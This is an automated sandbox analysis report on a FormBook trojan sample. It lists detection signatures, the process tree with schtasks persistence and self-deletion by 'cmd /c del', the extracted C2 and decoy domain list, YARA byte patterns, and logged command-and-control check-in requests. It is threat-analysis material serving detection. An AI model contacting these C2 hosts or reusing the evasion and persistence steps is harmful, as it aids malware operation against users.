Windows Analysis Report tgamf4XuLa

Overview

General Information

Sample Name: tgamf4XuLa (renamed file extension from none to exe)
Analysis ID: 483617
MD5: f8146a71dedc3eeeaa1624d6832c39a4
SHA1: b1007a3beab21c77513bb9c4e6fc2a04c6346c04
SHA256: 3611c1a2e9d1897825d5e7100a1c01d807f62a9c75d5f12602c168b0726d56ca
Tags: 32 exe trojan

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected FormBook
Malicious sample detected (through community Yara rule)
Yara detected AntiVM3
System process connects to network (likely due to code injection or exploit)
Sample uses process hollowing technique
Maps a DLL or memory area into another process
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Machine Learning detection for sample
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
.NET source code contains potential unpacker
Injects a PE file into a foreign processes
Queues an APC in another process (thread injection)
.NET source code contains very large strings
Tries to detect virtualization through RDTSC time measurements
Machine Learning detection for dropped file
Modifies the context of a thread in another process (thread injection)
C2 URLs / IPs found in malware configuration
Uses schtasks.exe or at.exe to add and modify task schedules
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
Antivirus or Machine Learning detection for unpacked file
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
Internet Provider seen in connection with other malware
Detected potential crypto function
Found potential string decryption / allocating functions
Sample execution stops while process was sleeping (likely an evasion)
Contains functionality to call native functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Contains functionality for execution timing, often used to detect debuggers
Contains long sleeps (>= 3 min)
Enables debug privileges
Found inlined nop instructions (likely shell or obfuscated code)
Sample file is different than original file name gathered from version info
Drops PE files
Contains functionality to read the PEB
Checks if the current process is being debugged
Binary contains a suspicious time stamp
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

Process Tree

  • System is w10x64
  • tgamf4XuLa.exe (PID: 6056 cmdline: 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
    • schtasks.exe (PID: 5080 cmdline: 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\HpnpObXJP' /XML 'C:\Users\user\AppData\Local\Temp\tmpEC5E.tmp' MD5: 15FF7D8324231381BAD48A052F85DF04)
      • conhost.exe (PID: 4704 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
    • tgamf4XuLa.exe (PID: 1956 cmdline: C:\Users\user\Desktop\tgamf4XuLa.exe MD5: F8146A71DEDC3EEEAA1624D6832C39A4)
      • explorer.exe (PID: 3388 cmdline: C:\Windows\Explorer.EXE MD5: AD5296B280E8F522A8A897C96BAB0E1D)
        • control.exe (PID: 6364 cmdline: C:\Windows\SysWOW64\control.exe MD5: 40FBA3FBFD5E33E0DE1BA45472FDA66F)
          • cmd.exe (PID: 6428 cmdline: /c del 'C:\Users\user\Desktop\tgamf4XuLa.exe' MD5: F3BDBE3BB6F734E357235F4D5898582D)
            • conhost.exe (PID: 6436 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • cleanup

Malware Configuration

Threatname: FormBook

{"C2 list": ["www.dressmids.com/vuja/"], "decoy": ["maryjanearagon.com", "casualwearus.com", "thephonecasedepot.com", "twinpeaksyouthbasketball.com", "secure-filliale.com", "thecoastalhomeshop.com", "poloandaccessories.com", "thesouthernchildtn.com", "whereallroadslead.com", "harecase.com", "discomountainkombucha.com", "tjandamber.com", "yctyhb.com", "miccitypb.com", "niliana.com", "fraktal.media", "goodgrrrldesign.com", "tcheapvrwdshop.com", "orchid-nirvana2.homes", "mckinleyacreage.com", "3333tax.com", "florentinatravel.com", "ecorna.com", "bold2x.com", "syzhtr.com", "seifenliebe.info", "6144prestoncircle.com", "simmetrypcs.com", "bottomslum.com", "affordablejetski.net", "hellocharmaine.com", "jvfojqjr.icu", "colourfulcollective.travel", "life2you.com", "d0berman245.xyz", "realstylecelebz.com", "thisisalemon.com", "fizzandfun.com", "expertexceleratorchallenge.com", "twpjg.com", "testnora.com", "knothairbandsny.com", "racanelliestimating.com", "aryaanenterprises.com", "cherrybunk.life", "beard-fuel.com", "reebootwithjoe.com", "vip5-paizacasino.com", "nobelcafe.com", "saifreshmart.com", "astcvic.com", "noblehousekitchen.com", "facebooktransfer.com", "humanareachreards.com", "parttimesneakerhead.com", "geliboluwebtasarim.com", "ripvangordo.com", "hitcitybaseball.net", "hostingfun.net", "gfd.xyz", "gighomesale.com", "allthatrom.com", "allenleather.com", "officallive33.com"]}

Yara Overview

Memory Dumps

Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x4695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x4181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x4797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x33fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0xa82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x66b9:$sqlite3step: 68 34 1C 7B E1
  • 0x67cc:$sqlite3step: 68 34 1C 7B E1
  • 0x66e8:$sqlite3text: 68 38 2A 90 C5
  • 0x680d:$sqlite3text: 68 38 2A 90 C5
  • 0x66fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x6823:$sqlite3blob: 68 53 D8 7F 8C
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(24 further memory-dump entries not shown)

Unpacked PEs

Source: 6.2.tgamf4XuLa.exe.400000.0.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x77e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x7b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x13895:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x13381:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x13997:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x13b0f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x859a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x125fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0x9312:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x18987:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x19a2a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack; Rule: Formbook; Description: detect Formbook in memory; Author: JPCERT/CC Incident Response Group; Strings:
  • 0x158b9:$sqlite3step: 68 34 1C 7B E1
  • 0x159cc:$sqlite3step: 68 34 1C 7B E1
  • 0x158e8:$sqlite3text: 68 38 2A 90 C5
  • 0x15a0d:$sqlite3text: 68 38 2A 90 C5
  • 0x158fb:$sqlite3blob: 68 53 D8 7F 8C
  • 0x15a23:$sqlite3blob: 68 53 D8 7F 8C
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack; Rule: JoeSecurity_FormBook; Description: Yara detected FormBook; Author: Joe Security
Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack; Rule: Formbook_1; Description: autogenerated rule brought to you by yara-signator; Author: Felix Bilstein - yara-signator at cocacoding dot com; Strings:
  • 0x85e8:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x8982:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
  • 0x14695:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
  • 0x14181:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
  • 0x14797:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
  • 0x1490f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
  • 0x939a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
  • 0x133fc:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
  • 0xa112:$sequence_7: 66 89 0C 02 5B 8B E5 5D
  • 0x19787:$sequence_8: 3C 54 74 04 3C 74 75 F4
  • 0x1a82a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
(1 further unpacked-PE entry not shown)

Sigma Overview

No Sigma rule has matched

Jbx Signature Overview

AV Detection:

Found malware configuration
Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp; Malware Configuration Extractor: FormBook (the extracted C2 list and decoy domains are identical to the configuration listed under Malware Configuration above)
Yara detected FormBook
Source: Yara match; File source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match; File source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match; File source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORY
Source: Yara match; File source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match; File source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Machine Learning detection for sample
Source: tgamf4XuLa.exe; Joe Sandbox ML: detected
Machine Learning detection for dropped file
Source: C:\Users\user\AppData\Roaming\HpnpObXJP.exe; Joe Sandbox ML: detected
Source: 6.2.tgamf4XuLa.exe.400000.0.unpack; Avira: Label: TR/Crypt.ZPACK.Gen
Source: tgamf4XuLa.exe; Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
Source: tgamf4XuLa.exe; Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Source: Binary string: control.pdb; source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
Source: Binary string: wntdll.pdbUGP; source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe, 00000014.00000002.504667464.0000000005060000.00000040.00000001.sdmp
Source: Binary string: wntdll.pdb; source: tgamf4XuLa.exe, 00000006.00000002.343446284.00000000013F0000.00000040.00000001.sdmp, control.exe
Source: Binary string: control.pdbUGP; source: tgamf4XuLa.exe, 00000006.00000002.343389175.0000000001380000.00000040.00020000.sdmp
Source: C:\Users\user\Desktop\tgamf4XuLa.exe; Code function: 4x nop then pop edi; 6_2_00415691
Source: C:\Windows\SysWOW64\control.exe; Code function: 4x nop then pop edi; 20_2_02ED5691

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49780 -> 52.25.92.0:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49790 -> 34.102.136.180:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49791 -> 99.83.154.118:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49792 -> 34.98.99.30:80
Source: Traffic; Snort IDS: 2031453 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
Source: Traffic; Snort IDS: 2031449 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
Source: Traffic; Snort IDS: 2031412 ET TROJAN FormBook CnC Checkin (GET) 192.168.2.3:49793 -> 91.195.240.94:80
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe; Network Connect: 91.195.240.94 80
Source: C:\Windows\explorer.exe; Domain query: www.tjandamber.com
Source: C:\Windows\explorer.exe; Domain query: www.fraktal.media
Source: C:\Windows\explorer.exe; Domain query: www.expertexceleratorchallenge.com
Source: C:\Windows\explorer.exe; Network Connect: 52.25.92.0 80
Source: C:\Windows\explorer.exe; Network Connect: 34.98.99.30 80
Source: C:\Windows\explorer.exe; Domain query: www.d0berman245.xyz
Source: C:\Windows\explorer.exe; Domain query: www.cherrybunk.life
Source: C:\Windows\explorer.exe; Domain query: www.hellocharmaine.com
Source: C:\Windows\explorer.exe; Domain query: www.syzhtr.com
Source: C:\Windows\explorer.exe; Network Connect: 34.102.136.180 80
Source: C:\Windows\explorer.exe; Network Connect: 99.83.154.118 80
Source: C:\Windows\explorer.exe; Network Connect: 103.72.144.19 80
Performs DNS queries to domains with low reputation
Source: C:\Windows\explorer.exe; DNS query: www.d0berman245.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor; URLs: www.dressmids.com/vuja/
Source: Joe Sandbox View; ASN Name: SEDO-ASDE
Source: Joe Sandbox View; ASN Name: AMAZON-02US
Source: global traffic; HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=xxaskX4zCBVE3yBbpvO7oTQxeCyuhPQrJ3bXakBVisDWUfPX6szXkiX7lnBBy6F9sRNz HTTP/1.1; Host: www.cherrybunk.life; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?a6PLdH6=knesP9qPdEIwhrsdCBVrK6TYPa8ARfupLdS+O1KjpVkHadf5O3a6XCWpr2FomIuS86ow&SrK0m=8pbLu8l0SV1lo HTTP/1.1; Host: www.d0berman245.xyz; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=+jKwoP3rxSUE2G3GWZal8U7hYP6reGb39kDXBTdBOy+lOhqfFK02kSVdLKlhCp2Y/9bB HTTP/1.1; Host: www.fraktal.media; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?a6PLdH6=QFFty8wvqhCytrBgHARX2ZkDyAOTnUZPmU5cb5PMMJEj0bAx9fBxVhYMw+XdeJtryV9Z&SrK0m=8pbLu8l0SV1lo HTTP/1.1; Host: www.expertexceleratorchallenge.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=HiF2JmV2owPq8HevY+6PLH0l3KgiDbtf8XOoOMXvRXgVDxDLxjWebHI9Pw488vMk9ORY HTTP/1.1; Host: www.hellocharmaine.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?a6PLdH6=u+wR1aKzpDV/TxGllf2QnEgeBGa/HBhCNRhMkmFjTPYp6U2j3/+A9H921q8yWaN2LpI/&SrK0m=8pbLu8l0SV1lo HTTP/1.1; Host: www.syzhtr.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=O/mUfy2FFtS6I/aReU4qHel2aPwRekNUtr7VAEKDTW8BEYcE6LKZB1SF0N7UsHI7MTf5 HTTP/1.1; Host: www.tjandamber.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=mvPzLoePd3E50JyZDmieD6pkHjcUl/YW6tCUslk4/nfE0VzZdnTMarol9oC9qsPy2Se0 HTTP/1.1; Host: www.realstylecelebz.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?a6PLdH6=mgzvXufYj6psHtNzSOMfQOc1unGQJGuCHGGdhDQCsGfwe59mkNL58xvD94UsnjjJj5NK&SrK0m=8pbLu8l0SV1lo HTTP/1.1; Host: www.dressmids.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: global traffic; HTTP traffic detected: GET /vuja/?SrK0m=8pbLu8l0SV1lo&a6PLdH6=vHKhDfdz3QjyoUuaK0fKX3k6vNUdxhN00gDlJT2hTfXNtdoBfWWdNbHAMnY3fHnn7Aqd HTTP/1.1; Host: www.discomountainkombucha.com; Connection: close; Data Raw: 00 00 00 00 00 00 00; Data Ascii:
Source: Joe Sandbox View; IP Address: 91.195.240.94
Source: global traffic; HTTP traffic detected: HTTP/1.1 404 Not Found; Server: nginx; Date: Wed, 15 Sep 2021 08:10:24 GMT; Content-Type: text/html; Content-Length: 146; Connection: close; Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a; Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html>
Source: tgamf4XuLa.exe, 00000000.00000002.236856394.00000000029C1000.00000004.00000001.sdmp; String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp; String found in binary or memory: https://www.colorfulbox.jp/?adref=nsexp_ad&argument=DLHtsrgz&dmai=a5b5a809168886
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp; String found in binary or memory: https://www.colorfulbox.jp/common/img/bnr/colorfulbox_bnr01.png
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp; String found in binary or memory: https://www.value-domain.com/
Source: control.exe, 00000014.00000002.507841513.0000000005712000.00000004.00020000.sdmp; String found in binary or memory: https://www.value-domain.com/modall.php
Source: unknown; DNS traffic detected: queries for: www.cherrybunk.life

E-Banking Fraud:

Yara detected FormBook
Source: Yara match; File sources: the same 2 unpacked PEs and 9 memory dumps listed for this signature under AV Detection above

          System Summary:

          barindex
          Malicious sample detected (through community Yara rule)Show sources
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.498298801.0000000003320000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.237658820.00000000039C9000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.497021542.0000000002EC0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000007.00000000.289170372.000000000E2BC000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.343304464.00000000012B0000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000014.00000002.503591641.0000000004DA0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000006.00000002.339207093.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          .NET source code contains very large stringsShow sources
          Source: tgamf4XuLa.exe, Forms/mainForm.csLong String: Length: 38272
          Source: HpnpObXJP.exe.0.dr, Forms/mainForm.csLong String: Length: 38272
          Source: 0.0.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 0.2.tgamf4XuLa.exe.6a0000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 6.2.tgamf4XuLa.exe.860000.1.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: 6.0.tgamf4XuLa.exe.860000.0.unpack, Forms/mainForm.csLong String: Length: 38272
          Source: tgamf4XuLa.exe | Static PE information: 32BIT_MACHINE, EXECUTABLE_IMAGE
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 6.2.tgamf4XuLa.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 6.2.tgamf4XuLa.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000007.00000000.315374095.000000000E2BC000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook_1 (date = 2018-11-23, author = Felix Bilstein - yara-signator at cocacoding dot com, malpedia_version = 20180607, description = autogenerated rule brought to you by yara-signator, malpedia_reference = https://malpedia.caad.fkie.fraunhofer.de/details/win.formbook, cape_type = Formbook Payload, malpedia_license = CC BY-NC-SA 4.0, version = 1, tool = yara-signator 0.1a, malpedia_sharing = TLP:WHITE)
          Source: 00000006.00000002.342682536.0000000000D80000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Formbook (author = JPCERT/CC Incident Response Group, description = detect Formbook in memory, rule_usage = memory scan, reference = internal research)
